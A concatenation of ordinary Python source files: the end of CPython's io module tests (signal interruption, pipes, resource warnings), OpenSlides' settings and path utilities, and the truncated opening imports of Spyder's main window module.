decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_removed_u_mode(self):
# bpo-37330: The "U" mode has been removed in Python 3.11
for mode in ("U", "rU", "r+U"):
with self.assertRaises(ValueError) as cm:
self.open(os_helper.TESTFN, mode)
self.assertIn('invalid mode', str(cm.exception))
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a', encoding="utf-8")
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w", encoding="utf-8")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings_helper.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r", encoding="utf-8")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(os_helper.TESTFN, 'w', encoding="utf-8"):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x', encoding="utf-8")
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+', encoding="utf-8")
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
def test_check_encoding_warning(self):
# PEP 597: Raise warning when encoding is not specified
# and sys.flags.warn_default_encoding is set.
mod = self.io.__name__
filename = __file__
code = textwrap.dedent(f'''\
import sys
from {mod} import open, TextIOWrapper
import pathlib
with open({filename!r}) as f: # line 5
pass
pathlib.Path({filename!r}).read_text() # line 8
''')
proc = assert_python_ok('-X', 'warn_default_encoding', '-c', code)
warnings = proc.err.splitlines()
self.assertEqual(len(warnings), 2)
self.assertTrue(
warnings[0].startswith(b"<string>:5: EncodingWarning: "))
self.assertTrue(
warnings[1].startswith(b"<string>:8: EncodingWarning: "))
def test_text_encoding(self):
# PEP 597, bpo-47000. io.text_encoding() returns "locale" or "utf-8"
# based on sys.flags.utf8_mode
code = "import io; print(io.text_encoding(None))"
proc = assert_python_ok('-X', 'utf8=0', '-c', code)
self.assertEqual(b"locale", proc.out.strip())
proc = assert_python_ok('-X', 'utf8=1', '-c', code)
self.assertEqual(b"utf-8", proc.out.strip())
@support.cpython_only
# Depending if OpenWrapper was already created or not, the warning is
# emitted or not. For example, the attribute is already created when this
# test is run multiple times.
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_openwrapper(self):
self.assertIs(self.io.OpenWrapper, self.io.open)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
@requires_alarm
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
@requires_alarm
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
@requires_alarm
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
@requires_alarm
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
@requires_alarm
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
@requires_alarm
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r", encoding="latin1")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = import_helper.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@requires_alarm
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(loader, tests, pattern):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = loader.suiteClass()
for test in tests:
suite.addTest(loader.loadTestsFromTestCase(test))
return suite
if __name__ == "__main__":
unittest.main()
|
main.py
|
import argparse
import ctypes
import os
import sys
import tempfile
import threading
import time
import webbrowser
from typing import Dict, Optional
from django.conf import ENVIRONMENT_VARIABLE
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import get_random_string
from mypy_extensions import NoReturn
DEVELOPMENT_VERSION = "Development Version"
UNIX_VERSION = "Unix Version"
WINDOWS_VERSION = "Windows Version"
WINDOWS_PORTABLE_VERSION = "Windows Portable Version"
class PortableDirNotWritable(Exception):
pass
class PortIsBlockedError(Exception):
pass
class DatabaseInSettingsError(Exception):
pass
class UnknownCommand(Exception):
pass
class ExceptionArgumentParser(argparse.ArgumentParser):
def error(self, message: str) -> NoReturn:
raise UnknownCommand(message)
def detect_openslides_type() -> str:
"""
Returns the type of this OpenSlides version.
"""
if sys.platform == "win32":
if os.path.basename(sys.executable).lower() == "openslides.exe":
# Note: sys.executable is the path of the *interpreter*
# the portable version embeds python so it *is* the interpreter.
# The wrappers generated by pip and co. will spawn the usual
# python(w).exe, so there is no danger of mistaking them
# for the portable even though they may also be called
# openslides.exe
openslides_type = WINDOWS_PORTABLE_VERSION
else:
openslides_type = WINDOWS_VERSION
else:
openslides_type = UNIX_VERSION
return openslides_type
def get_default_settings_dir(openslides_type: str = None) -> str:
"""
Returns the default settings path according to the OpenSlides type.
The argument 'openslides_type' has to be one of the three types mentioned in
openslides.utils.main.
"""
if openslides_type is None:
openslides_type = detect_openslides_type()
if openslides_type == UNIX_VERSION:
parent_directory = os.environ.get(
"XDG_CONFIG_HOME", os.path.expanduser("~/.config")
)
elif openslides_type == WINDOWS_VERSION:
parent_directory = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
parent_directory = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return os.path.join(parent_directory, "openslides")
def get_local_settings_dir() -> str:
"""
Returns the path to a local settings.
On Unix systems: 'personal_data/var/'
"""
return os.path.join("personal_data", "var")
def setup_django_settings_module(
settings_path: str = None, local_installation: bool = False
) -> None:
"""
Sets the environment variable ENVIRONMENT_VARIABLE, that means
'DJANGO_SETTINGS_MODULE', to the given settings.
If no settings_path is given and the environment variable is already set,
then this function does nothing.
If the argument settings_path is set, then the environment variable is
always overwritten.
"""
if settings_path is None and os.environ.get(ENVIRONMENT_VARIABLE, ""):
return
if settings_path is None:
if local_installation:
settings_dir = get_local_settings_dir()
else:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, "settings.py")
settings_file = os.path.basename(settings_path)
settings_module_name = ".".join(settings_file.split(".")[:-1])
if "." in settings_module_name:
raise ImproperlyConfigured(
"'.' is not an allowed character in the settings-file"
)
# Change the python path. Also set the environment variable python path, so
# change of the python path also works after a reload
settings_module_dir = os.path.abspath(os.path.dirname(settings_path))
sys.path.insert(0, settings_module_dir)
try:
os.environ["PYTHONPATH"] = os.pathsep.join(
(settings_module_dir, os.environ["PYTHONPATH"])
)
except KeyError:
# The environment variable is empty
os.environ["PYTHONPATH"] = settings_module_dir
# Set the environment variable to the settings module
os.environ[ENVIRONMENT_VARIABLE] = settings_module_name
def get_default_settings_context(user_data_dir: str = None) -> Dict[str, str]:
"""
Returns the default context values for the settings template:
'openslides_user_data_path', 'import_function' and 'debug'.
The argument 'user_data_path' is a given path for user specific data or None.
"""
# Setup path for user specific data (SQLite3 database, media, ...):
# Take it either from command line or get default path
default_context = {}
if user_data_dir:
default_context["openslides_user_data_dir"] = repr(user_data_dir)
default_context["import_function"] = ""
else:
openslides_type = detect_openslides_type()
if openslides_type == WINDOWS_PORTABLE_VERSION:
default_context[
"openslides_user_data_dir"
] = "get_win32_portable_user_data_dir()"
default_context[
"import_function"
] = "from openslides.utils.main import get_win32_portable_user_data_dir"
else:
data_dir = get_default_user_data_dir(openslides_type)
default_context["openslides_user_data_dir"] = repr(
os.path.join(data_dir, "openslides")
)
default_context["import_function"] = ""
default_context["debug"] = "False"
return default_context
def get_default_user_data_dir(openslides_type: str) -> str:
"""
Returns the default directory for user specific data according to the OpenSlides
type.
The argument 'openslides_type' has to be one of the three types mentioned
in openslides.utils.main.
"""
if openslides_type == UNIX_VERSION:
default_user_data_dir = os.environ.get(
"XDG_DATA_HOME", os.path.expanduser("~/.local/share")
)
elif openslides_type == WINDOWS_VERSION:
default_user_data_dir = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
default_user_data_dir = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return default_user_data_dir
def get_win32_app_data_dir() -> str:
"""
Returns the directory of Windows' AppData directory.
"""
shell32 = ctypes.WinDLL("shell32.dll") # type: ignore
SHGetFolderPath = shell32.SHGetFolderPathW
SHGetFolderPath.argtypes = (
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_void_p,
ctypes.c_uint32,
ctypes.c_wchar_p,
)
SHGetFolderPath.restype = ctypes.c_uint32
CSIDL_LOCAL_APPDATA = 0x001C
MAX_PATH = 260
buf = ctypes.create_unicode_buffer(MAX_PATH)
res = SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, 0, buf)
if res != 0:
# TODO: Write other exception
raise Exception("Could not determine Windows' APPDATA path")
return buf.value # type: ignore
def get_win32_portable_dir() -> str:
"""
Returns the directory of the Windows portable version.
"""
# NOTE: sys.executable will be the path to openslides.exe
# since it is essentially a small wrapper that embeds the
# python interpreter
portable_dir = os.path.dirname(os.path.abspath(sys.executable))
try:
fd, test_file = tempfile.mkstemp(dir=portable_dir)
except OSError:
raise PortableDirNotWritable(
"Portable directory is not writeable. "
"Please choose another directory for settings and data files."
)
else:
os.close(fd)
os.unlink(test_file)
return portable_dir
def get_win32_portable_user_data_dir() -> str:
"""
Returns the user data directory to the Windows portable version.
"""
return os.path.join(get_win32_portable_dir(), "openslides")
def write_settings(
settings_dir: str = None,
settings_filename: str = "settings.py",
template: str = None,
**context: str,
) -> str:
"""
Creates the settings file at the given dir using the given values for the
file template.
Retuns the path to the created settings.
"""
if settings_dir is None:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, settings_filename)
if template is None:
with open(
os.path.join(os.path.dirname(__file__), "settings.py.tpl")
) as template_file:
template = template_file.read()
# Create a random SECRET_KEY to put it in the settings.
# from django.core.management.commands.startproject
chars = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)"
context.setdefault("secret_key", get_random_string(50, chars))
for key, value in get_default_settings_context().items():
context.setdefault(key, value)
content = template % context
settings_module = os.path.realpath(settings_dir)
if not os.path.exists(settings_module):
os.makedirs(settings_module)
with open(settings_path, "w") as settings_file:
settings_file.write(content)
if context["openslides_user_data_dir"] == "get_win32_portable_user_data_dir()":
openslides_user_data_dir = get_win32_portable_user_data_dir()
else:
openslides_user_data_dir = context["openslides_user_data_dir"].strip("'")
os.makedirs(os.path.join(openslides_user_data_dir, "static"), exist_ok=True)
return os.path.realpath(settings_path)
def open_browser(host: str, port: int) -> None:
"""
Launches the default web browser at the given host and port and opens
the webinterface. Uses start_browser internally.
"""
if host == "0.0.0.0":
# Windows does not support 0.0.0.0, so use 'localhost' instead
start_browser(f"http://localhost:{port}")
else:
start_browser(f"http://{host}:{port}")
def start_browser(browser_url: str) -> None:
"""
Launches the default web browser at the given url and opens the
webinterface.
"""
try:
browser = webbrowser.get()
except webbrowser.Error:
print("Could not locate runnable browser: Skipping start")
else:
def function() -> None:
# TODO: Use a nonblocking sleep event here.
time.sleep(1)
browser.open(browser_url)
thread = threading.Thread(target=function)
thread.start()
def get_database_path_from_settings() -> Optional[str]:
"""
Retrieves the database path out of the settings file. Returns None,
if it is not a SQLite3 database.
Needed for the backupdb command.
"""
from django.conf import settings as django_settings
from django.db import DEFAULT_DB_ALIAS
db_settings = django_settings.DATABASES
default = db_settings.get(DEFAULT_DB_ALIAS)
if not default:
raise DatabaseInSettingsError("Default databases is not configured")
database_path = default.get("NAME")
if not database_path:
raise DatabaseInSettingsError("No path or name specified for default database.")
if default.get("ENGINE") != "django.db.backends.sqlite3":
database_path = None
return database_path
def is_local_installation() -> bool:
"""
Returns True if the command is called for a local installation
This is the case if manage.py is used, or when the --local-installation flag is set.
"""
return "--local-installation" in sys.argv or "manage.py" in sys.argv[0]
def is_windows() -> bool:
"""
Returns True if the current system is Windows. Returns False otherwise.
"""
return sys.platform == "win32"
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import re
import shutil
import signal
import socket
import glob
import subprocess
import sys
import threading
import traceback
import importlib
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
